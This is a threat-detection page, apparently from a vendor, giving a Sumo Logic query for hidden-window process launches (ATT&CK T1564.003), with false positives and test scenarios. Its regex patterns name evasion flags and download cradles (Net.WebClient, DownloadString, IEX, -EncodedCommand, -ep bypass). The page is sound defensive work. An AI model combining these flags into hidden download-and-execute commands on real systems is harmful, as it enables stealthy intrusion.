T1564.003 Sumo Logic CSE · Sumo

Detect Hidden Window in Sumo Logic CSE

Adversaries may use hidden windows to conceal malicious activity from users. On Windows, this is achieved through PowerShell's -WindowStyle Hidden flag or by using the ShowWindow API with SW_HIDE. The CreateProcess API's STARTUPINFO structure also allows processes to be created without a visible window. On macOS, the LSUIElement or LSBackgroundOnly Info.plist keys make applications background-only. Malware families using hidden windows include Astaroth, QuietSieve, StrongPity, and LockBit 2.0.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1564 Hide Artifacts
Sub-technique
T1564.003 Hidden Window
Canonical reference
https://attack.mitre.org/techniques/T1564/003/

Sumo Detection Query

Sumo Logic CSE (Sumo)
sql 
_sourceCategory=*windows* OR _sourceCategory=*sysmon* OR _sourceCategory=*endpoint*
| where _raw matches /EventCode=1|EventID=4688/
| parse regex field=_raw "(?:CommandLine|ProcessCommandLine|CommandLine)\s*=\s*\"(?<command_line>[^\"]+)\"" nodrop
| parse regex field=_raw "(?:Image|NewProcessName)\s*=\s*\"(?<process_image>[^\"]+)\"" nodrop
| parse regex field=_raw "(?:ParentImage|ParentProcessName)\s*=\s*\"(?<parent_image>[^\"]+)\"" nodrop
| parse regex field=_raw "(?:User|SubjectUserName)\s*=\s*\"(?<username>[^\"]+)\"" nodrop
| parse regex field=_raw "(?:Computer|ComputerName)\s*=\s*\"(?<hostname>[^\"]+)\"" nodrop
| where (
    process_image matches /(?i)(powershell|pwsh|cmd|wscript|cscript)\.exe$/
  )
| where (
    command_line matches /(?i)(-[Ww]indow[Ss]tyle\s+[Hh]idden|-w\s+hidden|-windowstyle\s+h)/
    or command_line matches /(?i)\/hh/
    or (command_line matches /(?i)(-NonInteractive|-noni|-NonI)/ and command_line matches /(?i)(-WindowStyle|-w )/)
  )
| eval ps_hidden = if(command_line matches /(?i)(-WindowStyle Hidden|-w hidden|-windowstyle h)/, 1, 0)
| eval encoded_cmd = if(command_line matches /(?i)(-EncodedCommand|-enc |-e |-ec )/, 1, 0)
| eval download_cradle = if(command_line matches /(?i)(Net\.WebClient|Invoke-WebRequest|DownloadString|IEX)/, 1, 0)
| eval policy_bypass = if(command_line matches /(?i)(-ExecutionPolicy Bypass|-ep bypass)/, 1, 0)
| eval risk_score = ps_hidden + encoded_cmd + download_cradle + policy_bypass
| where ps_hidden = 1
| fields _time, hostname, username, process_image, command_line, parent_image, ps_hidden, encoded_cmd, download_cradle, policy_bypass, risk_score
| sort by _time desc
high severity high confidence

Detects hidden window technique via PowerShell and scripting host processes with -WindowStyle Hidden or /hh arguments. Computes a composite risk score by checking for encoded commands, download cradles, and execution policy bypass co-occurring with the hidden window flag.

Data Sources

Sysmon EventID 1 via Sumo Logic Installed CollectorWindows Security EventID 4688 with process command line auditing enabled

Required Tables

Windows Sysmon logsWindows Security Event Logs

False Positives & Tuning

  • Scheduled tasks running PowerShell maintenance scripts silently (e.g., disk cleanup, Windows Defender updates, certificate renewal)
  • Software deployment systems (PDQ Deploy, Chocolatey, Ninite) using hidden PowerShell to install applications without desktop prompts
  • Monitoring agents or backup clients invoking hidden PowerShell for health checks or snapshot operations
Download portable Sigma rule (.yml)

Other platforms for T1564.003

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1PowerShell Hidden Window Execution

    Expected signal: Sysmon Event ID 1: powershell.exe with -WindowStyle Hidden in command line. Sysmon Event ID 11: file created at Temp path. PowerShell ScriptBlock Log Event ID 4104 with the command content.

  2. Test 2Hidden Window with Encoded Command

    Expected signal: Sysmon Event ID 1: powershell.exe with both -WindowStyle Hidden and -EncodedCommand in command line. PowerShell ScriptBlock Log Event ID 4104 showing decoded content 'whoami'.

  3. Test 3Hidden Window with Execution Policy Bypass and Download Cradle

    Expected signal: Sysmon Event ID 1: powershell.exe with all three flags. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080. The download will fail (no server) but both process creation and network events fire.

Last updated: 2026-04-21 Research depth: deep
References (4)

Unlock Pro Content

Get the full detection package for T1564.003 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1564Hide Artifacts

Related Sub-techniques

T1564.001Hidden Files and DirectoriesT1564.002Hidden UsersT1564.004NTFS File AttributesT1564.005Hidden File SystemT1564.006Run Virtual InstanceT1564.007VBA StompingT1564.008Email Hiding RulesT1564.009Resource ForkingT1564.010Process Argument SpoofingT1564.011Ignore Process InterruptsT1564.012File/Path ExclusionsT1564.013Bind MountsT1564.014Extended Attributes

Related Techniques

T1564Hide ArtifactsT1059.001PowerShellT1027.010Command ObfuscationT1053.005Scheduled TaskT1105Ingress Tool Transfer

Same Tactic: Defense Evasion

Popular Detections